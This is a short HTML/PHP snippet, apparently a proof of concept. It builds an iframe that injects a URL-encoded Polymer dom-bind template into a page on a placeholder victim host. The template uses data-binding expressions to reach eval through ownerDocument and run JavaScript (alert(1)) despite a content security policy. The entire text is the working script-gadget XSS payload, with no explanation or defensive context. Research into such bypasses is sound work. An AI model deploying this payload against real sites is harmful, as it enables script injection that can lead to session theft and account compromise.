<iframe src="https://victim.example.com/repo/csp/sd/polymer.php?csp=ue&inj=<?php 
$payload = <<<PAYLOAD
<template is=dom-bind><div
b="{{eval('alert(1)',ownerDocument)}}"
a={{set('eval',ownerDocument.defaultView.eval)}}
>
</div></template>
PAYLOAD;
echo urlencode($payload);
?>"></iframe>
